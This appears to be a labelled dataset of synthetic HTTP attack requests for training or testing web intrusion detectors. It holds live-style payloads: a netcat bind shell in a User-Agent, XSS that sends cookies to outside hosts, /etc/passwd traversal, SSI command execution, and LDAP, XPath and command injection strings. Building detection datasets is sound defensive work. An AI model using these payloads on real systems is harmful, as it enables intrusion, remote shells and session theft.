Cookie: e18gatNi6egnat=feaa7eseei;htNoOne=;xssou%deacande=He7;ieaHoehi8j6o=Tflikex&lDD$'wnyr
Cookie2: $Version="62"
Date: Tue, 20 Jul 04 12:44:42 GMT
ETag: "WpfgSQrU1A8ODIhi.NP"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Thu, 19 Mar 09 06:40:46 GMT
If-Unmodified-Since: Tue, 26 Jan 10 12:40:54 CET
If-Match: "he4K17EDeW3mllKWCm"
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 473
MIME-Version: 3.6
Pragma: ea82e=obwls20m
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: NTLM dFVvbjNjc2Voc29zb2lORWVyWTAzMGZvd2xpaTU4ZXN0Y2VudGh3YXRhb3M=
Range: -88
Referer: /enAT/nshh.msf
TE: gzip;q=0.5,deflate,deflate
Trailer: Warning
User-Agent: zstIle
UA-CPU: StrongARM
UA-Disp: 390,072,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 9.9 www.eyt8hh.html, 2.4 www.Uyhsrgo.jpg, 8.4 87.103.246.162
Transfer-Encoding: deflate
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47253
Start - Id: 36002
class: PathTransversal
POST /FawGa2sflsn2lgzdyo/glsaO2vix/_xTwindow.openHH/qdy5kcY90dwJjUt2P/Dc1ietvt/e81AULclx4crd6/wxX/nlpn9cPqq2RJU90/mpJ/e0sQnsrn/hXjAX@r0connectco_bXU.htm? HTTP/1.0
Content-Length: 209
Content-Language: GsLeaes,wtnby8n
Content-Encoding: gzip
Content-Location: /thitg.aspx
Content-MD5: Sm9laGJFU25kbGV0ZWVzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Sep 08 20:06:43 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: www.jew6szhE.fr:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-5;q=0.3, x-mac-cyrillic;q=0.5, windows-1257, iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 241.137.194.133
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Tue, 07 Apr 09 20:44:47 CET
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "Dz@NEzwdnh2mHynFDBs"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:40:25 GMT
Max-Forwards: 82
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: NTLM cm9taUFwYzFibDk2c1RlaXMyc2hoNG5yYWhldXN4bmV0ZQ==
Range: -22147
Referer: http://Esoyt7ar.uk/Rt5fo.cgi
TE: trailers,gzip,chunked
Trailer: Accept
User-Agent: Mozilla/0.9 (X11; U; Linux i586 3.2; na-nu; rv:8.5.0) Gecko/06933625
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.1 231.169.214.196, 2.7 105.213.1.233, 0.1 www.owoo7t.css
Transfer-Encoding: identity
Upgrade: Aeae/7.7, asLuh/9.6
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~

mhr5yae=Krme6&S3derleTbt3=eJxjQI-XcPKx&hlarO=29573281&ochm=mta&-iCwEvbscriptUEt=8YJD&uue=6&urensetrkyntc=r:\autoexec.bat&1osentciiisoeo=Aa5aleYrBseedlef&kq9agifE=Xueaelai7&obTleysxalcd7s=635&hieG=442708389

End - Id: 36002
Start - Id: 46113
class: PathTransversal
POST /oandBt/cmAxevs/n6eeEat32ltcbtsetssL/t3b-t27FDx5pQE9Q0kow/qiQeLk/havingJh1bR/ccr.TUayftT-shQ/ee9ta.msf? HTTP/1.1
Content-Length: 91
Content-Language: edaiEu
Content-Encoding: compress
Content-Location: http://sgendb.net/7tlsdWnH/nrte8/tsciih.pdf
Content-MD5: bmxhd25Tb2xidW1mY2lpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Dec 06 18:32:37 GMT
Last-Modified: Thu, 29 Mar 07 18:46:19 CET
Host: 19.98.197.112:80
Connection: sneurm
Accept: */*
Accept-Charset: iso-2022-jp;q=0.1, big5, windows-1258
Accept-Encoding: deflate, gzip;q=0.9, compress;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 128.211.32.12
Cookie: uPaRnDs=:f&q;5meyBharcne6ls=643177;Ano7u9=iplGAdb
Cookie2: $Version="6"
Date: Tue, 30 Oct 07 18:18:02 UTC
ETag: W/"oSiqqhx9H424PVN"
Expect: oA66net
From: sneTb@ntoa.org
If-Modified-Since: Fri, 22 Feb 08 04:50:15 UTC
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "vOC6dqi_Niksxo.@ZY7"
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 2.9
Pragma: qep='hnU'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Digest nonce
Range: -03018,-4474
Referer: /lah7twgk/s5rdnae.bin
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: E8rRcx/1.3.8.7.9
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

idaccess_lognt2=5hox&silslea6ka=axd&eaioBveetb9ano=Huhossnfwcfstntees&8n3xd=/etc/passwd

End - Id: 46113
Start - Id: 36642
class: OsCommanding
GET /tYXustKYZ5r/1pjJ4MGe/tDzEz8A0ZyByrgNFi8f/nKTRh/Nesekredophcts4Lay/d9ytb60tIcHh/lC8O.@PkmF@4tWhe/nxGcrs/eEep1kcaInv/fvDr-.jsp?UZfwaV=c_Ae3.cXpM&an=Ns&ltldi=iutr72ns&SwErN=Ps&poeUmene=hog9b9ZR&yIsLup4=redoesTpdnlNjtmiAl HTTP/1.1
Host: 60.215.194.86
Connection: dtoobms
Accept: audio/*;q=0.6, image/gif;q=0.9
Accept-Charset: windows-1252;q=0.4, iso-8859-6;q=0.4, iso-8859-15;q=0.6
Accept-Encoding: deflate
Accept-Language: m-an, sbozy-m;q=0.8, eunnuhen-tZn, rhegtis-ant;q=0.5
Cache-Control: no-transform
Cookie2: $Version="0"
ETag: W/"2rLav0qyR9SB-U77N8"
From: xlScpe0i@m5tlbfnn.fr
If-Modified-Since: Sun, 11 Feb 07 04:17:09 UTC
If-Unmodified-Since: Fri, 26 Feb 10 09:49:28 GMT
If-None-Match: *
If-Range: Thu, 27 Oct 05 11:50:17 UTC
Max-Forwards: 532
MIME-Version: 2.3
Referer: http://www.lrekee.cz/7rxIdb/3DI1ee/uoyeew/Eoq4pi/jnrgjhi.png
Trailer: Proxy-Authorization
User-Agent: |   shell(   "cmd     /c  c:InetpubwwwrootMSISSnc.exe -l  -p  7762 -t -e   cmd.exe    " )    |  '
Via: 8.9 www.anfn.shtml, 8.2 www.eDvnrdv.html, 3.1 www.ncnseeeo.js
Upgrade: era/3.5, egberm/3.8

null

End - Id: 36642
Start - Id: 47155
class: XSS
GET /u4irPdaescin/ef6rm/bgeeitaxeyioti/aatemehiatbawod86t/tuRB1roterden/ealOteamoJeotSEiec/update7JX/Ciekffrstodr1.gif?6HFuYoSK=%3Cdiv+style+%3D+++%22++width%3A+expression%28%5Balert++%28%27eliw%27%29%3B%5D%29%3B+%22++++%3E&ShsZar=12434769&FCVwviWQaF=eNmKWp5&iOmIrh3bOrh=h&ghursri=uoitoaeAm4ro7d&aic84vda=39665627&Aacsc4eizGr6i=84281&2eN=903&lnmt7=8&IEB5Ds9=o0da4&mksyIihwdoW=Onato&0r3qqBAgytmp@Z=n+is HTTP/1.0
Host: www.acGaaAHh.st
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: me1lnre-tuao;q=0.9, sv-neeiiafc;q=0.5, rqn-icNtwsr, Tomeyhh-iirht
Cache-Control: atdf7p=aji0gdn
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Fri, 01 Jan 10 21:10:46 CET
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: 100-continue
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Thu, 22 Nov 07 16:20:04 GMT
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 6
MIME-Version: 4.5
Pragma: Cloqz='n'
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: gfom gs7ueewn=wirhur
Range: -016,1-,67332-47295
Referer: /omd62.doc
TE: trailers
Trailer: If-Modified-Since
User-Agent: pU7QuuKOky http://www.iiuh.cz
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 098 www.se8ib.png "Tiuetid8Hcaheepfhsi9" "Wed, 22 Feb 06 01:21:28 GMT"
X-Forwarded-For: 27.208.219.12
X-Serial-Number: 155966371996
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47155
Start - Id: 47887
class: XSS
GET /yU3o3bHc/kU@17rEOIv3oRA.a/a70UwDnWEUW-/ien4e9ngdcytnTwus3e/vw/like2Z/MUGQ/nqlarF5Zwb1.aspx?JZKR=307893&nyesdfgooDow0oi=tdeletev&mp20nnaREh=woi%3Az&klato7ononwpS=tp.rCb7rSSc3&dljbi=iupJtjIyAv&8d=6&h3HrtynzeiTerit=%3Cimg++src+%3D%22+++++maan++++%3E++%22+onmouseover+%3D+++%22+++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.lintieel.com%2Fcgi-bin%2Froro.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&q@NZGHZCc=61&nzoerttsame=e6ndgiwindow.openm&ev=+e%29&hbottjizbe=m%3B HTTP/1.0
Host: 172.182.46.164
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 200.232.9.198
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Thu, 15 Jan 04 20:21:41 GMT
ETag: W/"yZNtlkR9dyH6DUBIC"
Expect: 100-continue
From: clrwp@noorqoy.ch
If-Modified-Since: Fri, 09 Jun 06 19:55:20 GMT
If-Unmodified-Since: Fri, 25 Apr 08 06:36:25 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Dec 06 23:38:36 GMT
Max-Forwards: 4305
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: NTLM aXB6ZW9pbXQyMWV3VEVzb2tlaXRvdGVlaXRsdHI1bzBvYzFvZzZldGVOcmlOb3k=
Range: -43,-33,199214-
Referer: /ydsbe.mspx
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: n3hys/4.2.2
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 084x9415
Via: 2.6 www.osr8a7.js
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47887
Start - Id: 40543
class: SSI
GET /tdmwitsnitbohduxtu/tS4PzmB-rO/nttndaioenrwPuU5/r9KNvXr50/wi88/t8/e4/1aAnof2Ntvh/eacaTteson/c9t9esn3rao/tvF_.M.css?wsttc6l5=5&AzIlo=s8noro&crranyfqLh3sNt=6+so2l+%3Do&zqreseaah1csoe=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&7Vconnect3btMphpe@=lqeunph-&utrt=txen%3AoLoug&sieCRene=ne&ihledaohr3Qbrz=access_logb&tbpisGtBonoe=453&NHWFV=78&crcteeo3edd=1353461438&PQevalN=28085&NElo3acseyd3=unbdec1doa&ALlocation8w6RN=68an&zsogse=rnx%2BC%27yceM%3B HTTP/1.0
Host: www.eejhhcr.de
Connection: close
Accept: audio/*;q=0.6, text/*, image/jpeg
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.7
Accept-Language: lohYia-ednkoh;q=0.5
Cache-Control: no-transform
Client-ip: 131.145.233.117
Cookie: eepmo=sSef;otltu=Cwatdrs554Ed7;en40hOooye=945;Enie=3268991;n2ae1oaow8=\o[e0;aNsurnt9awyn=ooowp-p8
Cookie2: $Version="85"
Date: Sun, 19 Jun 05 18:14:23 UTC
ETag: W/"XZevC_bwA58lBhPSH"
Expect: e6isnhs=fbse9rn
From: ta3nehq@tidsguy.fr
If-Modified-Since: Mon, 13 Sep 04 10:37:27 GMT
If-Unmodified-Since: Sun, 14 Nov 04 10:30:42 CET
If-Match: *
If-None-Match: "MwoAPGe8uweEN@CNfP"
If-Range: Wed, 09 Feb 05 06:51:08 GMT
Max-Forwards: 157
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM UXNlZWVkbHRiYWd4OHNhdHZkY2pjc2NhNUVhcGRucmU=
Authorization: Basic b3FMMmVhbjp0Y2E3ZWVsbQ==
Range: -130317
Referer: /isrtlytl.pl
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: ur6VggC http://www.etno.de
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3418x3633
Via: FTP/8.7 12.106.9.27, FTP/2.4 www.udnsi.jpeg, 2.0 www.paxOs7h.htm
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 63.255.2.132
X-Serial-Number: 2305007753
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40543
Start - Id: 39973
class: SSI
GET /yi1piz@8T/aYRfQZv4Q6/tbhaihbkdfbht/bzy4hSe6jptvh2a5/tan3wVnele/yfc93fK/tres.exe?sujiesesreeiar=tQz-IfTg&ur=Dht&hwmqh=%3C%21++++%23%3C%21--+++++%23exec+++++cmd%3D%22id%22--%3E&pasceFrhltwotF=winntda&eenmsesTEeao2=a6teh0yi&oxxHaouere=+Br&NIkCaL3CEq-9=ologeQ&WVge=yo%3Do2 HTTP/1.0
Host: 66.69.65.200
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.8, ks_c_5601-1987, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: esnlQsy='rmo'
Client-ip: 160.248.173.144
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="03"
Date: Tue, 10 Mar 09 08:34:20 CET
ETag: W/"AZnigfVHFs0zM56rr"
Expect: a3hy
From: geep3@ewvRfcmr4A.be
If-Modified-Since: Tue, 12 Jun 07 15:13:42 UTC
If-Unmodified-Since: Tue, 21 Mar 06 09:50:52 CET
If-Match: "e0fFytcaxWAbrhOY5"
If-None-Match: "95YR2lZcNjXd3cUKil_"
If-Range: *
Max-Forwards: 86
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic OWVlbXRlOmVubWVyYWd0
Range: 75-
Referer: /cohideTi.mp3
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 1.1; r7-e9; rv:4.6.5) Gecko/65305542
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39973
Start - Id: 40222
class: SSI
POST /o5wrtO0hvLZ/vWPt/sIf/nPFaEbqmIJy8.cfm? HTTP/1.0
Content-Length: 143
Content-Language: pm4
Content-Encoding: deflate
Content-Location: /o8gi/rosecIq/obs5hB.conf
Content-MD5: YTdpZWlsdXM4ZWlScGFhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jun 04 18:13:12 UTC
Last-Modified: Sat, 03 Jun 06 24:39:29 UTC
Host: www.sfbenue6c.ch:80
Connection: close
Accept: audio/basic, text/*;q=0.3, image/jpeg;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: erAds-sccty;q=0.6, bE-5shlo;q=0.2, mrud-In1nktt;q=0.2, isis-cia4eeyt;q=0.0, mTunb-lpaetet
Cache-Control: no-transform
Cookie: jsgo=ege;nrkapqr=bv2G5;hc=<!-- #exec   cmd="/bin/ls   -l     /home/is/ystn6"    -->
Cookie2: $Version="8"
Date: Thu, 22 Jun 06 12:11:59 CET
ETag: "fEdZbQu8So3oNKR"
Expect: 100-continue
If-Modified-Since: Tue, 25 Dec 07 20:52:33 UTC
If-Unmodified-Since: Sat, 16 Oct 04 16:00:27 GMT
If-Match: "SuFz34gu8pm0UQJ"
If-None-Match: "NxCJPHXj3x814kfWGGP_"
If-Range: *
Max-Forwards: 1
Pragma: no-cache
Authorization: NTLM Z2hkaXZ3NHVhdG9kRXJsYWVleGlubExuOWhha2RPcnRvb3RoYWZ0eTI4YzFm
Range: 92-76626,-676357,-5
Referer: http://hro0Aro7.org/pnce.pdf
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 5.8; fy-1i; rv:9.0.5) Gecko/44148254
UA-CPU: StrongARM
UA-Disp: 188,2764,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3720x9206
Via: FTP/3.4 www.Kdtos.js, FTP/4.2 www.vldM.css
Transfer-Encoding: gzip
Upgrade: lapei/3.4, naiR04/1.2, tnt/2.4, Ahn/9.3
Warning: 588 www.tuee.html "mrOe5pesLotklenpnp" 
X-Serial-Number: 605528313919
----: ----------------------------------

8ea=rlv&5ekOthca=4&FLIQhh=oaete(if&miqwry6darAi=aadropm;3hsaOdr&7ArmhLHwe5=xmlstyleh'e&4hp2PLs_ui=%tl=&nedavoL=385324&tfidiecoes4d=ya

End - Id: 40222
Start - Id: 49081
class: XPathInjection
GET /ejKiRMnQvB892/KOa/window.openyIvar3j/aE22/eeBeio5E6r3ttmu/uBj2fromEB8J0dpassthruexec_hI/4NSccxiSw0Eyoz/evqLqc/NbgTIpg0wYvLB/poeime7ntjbIo0ott/eO._/HRSuKjew.nsf?sr1vaLauoBeYia4=5529473&ojtzd=862&ruSgerolhgh=3H%2FaNndm%2FSh1%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D23%5D+++++or+%27oaktEsrt%27++++%3D++++%27&tmoghte=284733380&o2yCG=+ri3where%26&vp=s+%3Fcplussystem4nios%3Ehea&suu5peeeisu=t6uotsvaNEnnrGE&Hsg=hs6ief%3Erierteu&obEslblwloFrteT=91554&v5_rcpformh2ftmpQW=5979421405 HTTP/1.0
Host: 134.88.6.23
Connection: latkee0
Accept: */*;q=0.2
Accept-Charset: windows-1252;q=0.8, cp-936;q=0.6, iso-8859-9;q=0.0, euc-cn, x-mac-japanese;q=0.2
Accept-Encoding: *
Accept-Language: lc0rKrm-M77nmm, fhczhr9-rlsh0, et-bSpei;q=0.7, cgag-aiITdwha;q=0.0
Cache-Control: min-fresh=66324
Client-ip: 22.250.1.169
Cookie: efreameasgswst=94;ianesZnalds=y8dbrAhmEHt;fa1gpyewd6Epav=ossddchoai;h6fr7os3eNaadth=iZmH5;c6i=3dna;sbd7maAhm='7
Cookie2: $Version="155"
Date: Sat, 10 Jan 09 21:18:00 GMT
ETag: W/"A619wF0sDd52IAUn"
Expect: 100-continue
From: eynba@e3yzoc.com
If-Modified-Since: Wed, 10 May 06 15:03:51 GMT
If-Unmodified-Since: Fri, 08 Apr 05 16:50:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 253
MIME-Version: 5.6
Pragma: ny='I4sjtss'
Proxy-Authorization: Digest username="tlens"
Authorization: NTLM ZXBvd3JlNmluaWVtaUF5b21vZHRTamFld2tlb2xpZXExbTM2YXJh
Range: -39415,-80233
Referer: /apohRrhe.txt
TE: deflate
Trailer: Date
User-Agent: Mozilla/9.3 (Windows; U; Win 9x 7.5; ee-we; rv:5.6.0) Gecko/21314589
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: HTTP/9.5 33.37.3.77, 1.2 213.206.105.161:57
Transfer-Encoding: deflate
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 43.74.174.24
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49081
Start - Id: 37427
class: LdapInjection
GET /eT8Tk2apcHF8Bz/tiayoTtatonti3/bzrr6akZ5Ck.S8/nRu9/dwt42@-UnRKjCUz/gYeLC/bQ2M.js?n3ntth9ewEe=ksklIdeew&iiatrooT=smE7o64Rd_DR&vrUYBinputzU-X1=lZ%40qA-9&aAnugotdae=Ud2n&o8n2Ody=3&ir7OVfopt=e9ewrha&etaLewSnzthIas=trEtlSjvhtob8rNqu HTTP/1.0
Host: www.ewqaokh.be
Connection: keep-alive
Accept: text/*;q=0.9, image/*;q=0.2, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: Sin9n-3nyoae1t, 0I1Sr-td;q=0.6
Cache-Control: only-if-cached
Client-ip: 242.172.235.194
Cookie: t_y1=atLlttesh34tcqt5;-deleteOMREwn=tW@3BA5k3by0;BcrgeR=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="88"
Date: Wed, 06 Jul 05 14:31:05 CET
ETag: "9SrTJODo@H59_2O4RH"
Expect: 100-continue
From: iswk@2hueDzadi.st
If-Modified-Since: Thu, 28 Oct 04 24:36:25 GMT
If-Unmodified-Since: Fri, 28 Nov 08 12:42:14 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Apr 10 15:50:38 GMT
Max-Forwards: 7448
MIME-Version: 8.8
Pragma: srh2='niLt5'
Proxy-Authorization: Basic ZnNybE86b3NzcmRl
Authorization: Digest opaque="cnIhot"
Range: 224837-30,04-,5736-80
Referer: http://ageatH98.com/qigea/yyieVes0/rag5n9.jpg
TE: deflate
Trailer: Expect
User-Agent: 4itsSrnnT/7.3.3
UA-CPU: 68000
UA-OS: Solaris
Via: ilru1t/5.9 97.64.231.59
Transfer-Encoding: olet
Upgrade: tNlTm/0.9, cta8T/8.8, wwlEn/3.1, o9lne9/1.6, 2ee4Ai/5.8
Warning: 631 www.iErtre.shtml "1kti" 
X-Forwarded-For: 89.11.66.103
X-Serial-Number: 72751646141321636883
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37427
Start - Id: 47387
class: XSS
GET /mmtirth5i/iatt2rEe7ld7iel/nZ5Oefsto.jsp?o5rssebdtz3g=0ty+style%3Dleft%3Aexpression%28alert++++%28duEnr.e%29%29 HTTP/1.1
Host: 167.133.218.96
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 28.115.64.238
Cookie: S5zVAJchildOSp=fiatm ;toosowg=dHootqil;ie=9091
Cookie2: $Version="936"
Date: Fri, 17 Jul 09 10:15:11 GMT
ETag: W/"vz07DW56vH-BLZy"
Expect: 100-continue
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Tue, 11 Jan 05 05:25:11 CET
If-Unmodified-Since: Fri, 27 Jan 06 05:44:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7856
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 35419-,75138-2674,165640-
Referer: /g3sentn.doc
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 6.8; Ac-c4; rv:4.3.3) Gecko/56165689
UA-CPU: MIPS
UA-Disp: 7745,5252,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: 0.0 240.221.188.123, HTTP/0.4 www.eYEtzha.jpg:8, 4.3 www.ivo4he.css
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47387
Start - Id: 36589
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: 150.96.187.28:283
Connection: bsxeio
Accept: */*;q=0.1
Accept-Charset: hz-gb-2312, macintosh, iso-2022-jp;q=0.2, euc-tw;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=2
Client-ip: 88.241.103.90
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="52"
Date: Wed, 19 May 04 24:42:28 GMT
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Sun, 17 Sep 06 13:13:29 UTC
If-Match: "KD-QQ.KejX.y736D"
If-None-Match: "jUpFmEEN-J_DlhUFJX3c"
If-Range: Tue, 02 May 06 22:49:50 GMT
Max-Forwards: 5915
MIME-Version: 1.8
Pragma: t1ta=gonilEa
Proxy-Authorization: Basic em9lZ2xJOmVoVWUzcmpO
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: -5
Referer: /lToh1og.msf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: 7v_Fiyy http://www.Diamn4.be
UA-CPU: MIPS
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 85.216.148.175
Transfer-Encoding: weytp; aa4iwne=on7I4ht
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 35669547632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36589
Start - Id: 47895
class: XSS
GET /oAX.cfm?9GpCEaHu=e8y7Wstn98oefzqmdf&teOnai=%7C&mrsoe0my=4&dt4ulohciraVsi=%3Cimg++dynsrc+++%3D++%22+++++javascript%3A++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.lileer.com%2Fcgi-bin%2Fmavesier.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&zoi=Yhalbl&rohlmeiEes=%3Ctsm%25s168e&o8n=0727185253&eae1weae=s8PU2Bh&htqoiet=o8rset6%25uTLunz%2F&en6mhlh=uz94T HTTP/1.0
